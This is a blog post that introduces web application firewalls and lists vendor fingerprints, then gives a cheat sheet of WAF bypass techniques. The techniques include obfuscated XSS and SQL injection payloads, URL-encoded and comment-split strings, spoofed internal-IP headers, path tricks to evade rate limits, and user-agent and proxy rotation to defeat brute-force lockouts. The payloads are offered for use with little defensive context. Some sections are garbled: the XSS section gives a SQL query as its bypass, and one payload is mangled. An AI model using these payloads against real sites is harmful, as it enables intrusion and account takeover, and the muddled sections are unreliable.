Unique WAF Bypassing Methods…!!!

What is WAF…???

A web application firewall (WAF) is a firewall that monitors, filters, and blocks data packets as they travel to and from a website or web application.

A WAF can be either network-based, host-based, or cloud-based and is often deployed through a reverse proxy and placed in front of one or more websites or applications.

How does Actually WAF Works

A WAF analyzes Hypertext Transfer Protocol (HTTP) requests and applies a set of rules that define what parts of that conversation are benign and what parts are malicious. The main parts of HTTP conversations that a WAF analyzes are GET and POST requests. GET requests are used to retrieve data from the server, and POST requests are used to send data to a server to change its state.

The typical working style of WAF

Whitelisting, Blacklisting, Hybrid Security: Uses both the Above as rules.

Vendors for WAF:

AWS,Cloudflare,Akamai,Imperva,Verizon[EdgeCast],Sucuri and Many more

Responses Types to WAF:

AWS-WAF: awselb/2.0, AWSALB cookie values, Also sometimes with custom responses

CloudFront: Generated by CloudFront (CloudFront)


Akamai: AkamaiGHost

Imperva: Powered By Incapsula

Sucuri: Sucuri, X-Sucuri-ID, Access Denied — Sucuri Website Firewall

Verizon[EdgeCast]: Please contact the site administrator, and provide the following Reference ID: EdgeCast Web Application Firewall (Verizon)

F5 ASM: The requested URL was rejected.

ModSecurity: This error was generated by Mod_Security

NetScaler: NS-Cache

Nexusguard: speresources.nexusguard.com/wafpage/index.html

Palo Alto: Palo Alto Next-Generation Security Platform text snippet.

SonicWall: This request is blocked by the SonicWALL.

Sophos : Powered by UTM Web Protection

ZenEdge: X-Zen-Fury header.

Few facts on WAF

WAF`s Use the common ports such as port no 80,443,8008,8080 and 8088.

WAF`s Creates its own cookies while in the session.

WAF`s shows its presence in the response headers.

WAF`s Does not give complete control over DOS, DDOS attacks.

WAF`s can respond with unique response codes such as Descriptive errors

WAF`s are easily identifiable from simple network mappers such as traceroute, Nmap, response headers, Curl, banners

Unique Methods to bypass WAF security

When you are on Login Page.

Blocked Reason:

If the Waf is Blocking you from an intruder. [Account lockout, Brute Forcing]


Bypassing method:

Use random user-agents, ranging from Chrome Desktop to Phone browser.

use proxy chains, since chances are real that your IP gets blocked.

Use slight changes in Api path such as /v2/auth/login

Try with case sensitive`s at the paths such as /V1/auth/login

While checking for Sql Injection:

Blocked Reason

union select user, password from users

Bypassing methods

|| (select user from users where user_id = 1) = ‘admin’

While working on XSS:

Blocked reason:



Bypassing method:


sELecT * FrOm all_tables whERe OWNER = ‘DATABASE_NAME’

While working on URL Encoding:

Encode normal payloads with % encoding/URL encoding.

Blocked Reason:

1. <svG/x=”>”/oNloaD=confirm()//

2. uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)

Bypassing Method:

1. %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F

2. uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29

While Checking with Comments:

Comments obfuscate standard payload vectors.

Blocked Reason:

1. <script>alert()</script>

2. /?id=1+union+select+1,2,3 —

3. <a href=javascript;alert()>ClickMe

Bypassing Method:

1. <! →<script>alert/**/()/**/</script>

2. /?id=1+un/**/ion+sel/**/ect+1,2,3 —

3. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

While working on Request Header Spoofing:

Our target is to fool the WAF/server into believing it was from their internal network. Adding some spoofed headers to represent the internal network, does the trick. With each request, some set of headers is to be added simultaneously thus spoofing the origin.

The upstream proxy/WAF misinterprets the request was from their internal network and lets our gory payload through.

Bypassing Method:

1. X-Originating-IP:

2. X-Forwarded-For:

3. X-Remote-IP:

4. X-Remote-Addr:

5. X-Client-IP:

While checking for Rate limit:

Blocked reason:

The attacker is able to send 5000 requests within 10 mins, post 5000+ requests should be forbidden [403]

GET/POST/DELETE /v3/admin/add_data/122

Host: example.com

Bypassing methods

1. GET/POST/DELETE /../../../../../../v3/admin/add_data/122

Host: example.com

2. GET/POST/DELETE /v3/admin/add_data/122/../../../../../../../

Host: example.com

3. GET/POST/DELETE /v3/admin/add_data/122

Host: TAMPERD.example.com

4. GET/POST/DELETE /v3/admin/add_data/122

Host: example.com


5. GET/POST/DELETE /v3/admin/add_data/122

Remove all the request headers and send

Suggestions are most welcomed, Please write a mail to Akash.venky091@gmail.com, Also you can follow me here for more updates on Security,Ethical hacking Akash Venky

or contact me @ https://www.linkedin.com/in/akash-h-c-4a4090a7/



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store